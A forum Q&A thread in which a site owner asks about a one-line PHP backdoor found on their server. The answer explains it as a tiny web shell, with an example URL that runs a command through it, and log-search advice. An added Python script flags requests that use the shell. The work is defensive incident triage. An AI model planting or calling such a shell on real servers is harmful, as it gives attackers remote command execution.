
Found code left by hacker but don't understand what it does

I found a line of script left by the hacker in one of my PHP files. And it reads like this:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

Can anyone please give some hints about what this line of code does? Thank you

user2926814 asked Oct 29 '13 15:10




1 Answer

I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.

Reeno answered Oct 14 '22 14:10
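The log search suggested in the answer above, written out as a small triage script. This is an added example, not part of the original answer. It assumes access logs in the common/combined format, the log lines are constructed samples, and `find_shell_hits` is a hypothetical helper name. It goes slightly beyond the egrep by percent-decoding the query string, so a request that encodes the parameter name or value is still reported.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Oct/2013:14:02:11 +0000] "POST /file.php?2=shell_exec HTTP/1.1" 200 31',
    '203.0.113.7 - - [29/Oct/2013:14:02:40 +0000] "POST /file.php?x=1&%32=shell%5Fexec HTTP/1.1" 200 12',
    '198.51.100.20 - - [29/Oct/2013:14:03:02 +0000] "GET /list.php?page=2 HTTP/1.1" 200 5120',
    '198.51.100.20 - - [29/Oct/2013:14:03:05 +0000] "GET /index.php HTTP/1.1" 200 901',
]

def find_shell_hits(lines, param="2"):
    """Return one dict per logged request whose query string has a key `param`."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        url = urlsplit(m["target"])
        # parse_qs percent-decodes keys and values, so %32=shell%5Fexec
        # is seen as 2=shell_exec; "page=2" has key "page" and is ignored.
        values = parse_qs(url.query, keep_blank_values=True).get(param)
        if not values:
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "method": m["method"],   # POST matters: the argument is in the body
            "path": url.path,
            "status": int(m["status"]),
            "callee": values[0],     # function name the shell was asked to call
        })
    return hits

if __name__ == "__main__":
    for h in find_shell_hits(SAMPLE_LOG):
        print(f'{h["time"]}  {h["ip"]}  {h["method"]} {h["path"]}  '
              f'-> {h["callee"]}(<POST body, not logged>)  status={h["status"]}')
```

As the answer notes, only the GET half is visible in the access log; the POST argument is recoverable only if request bodies were captured elsewhere.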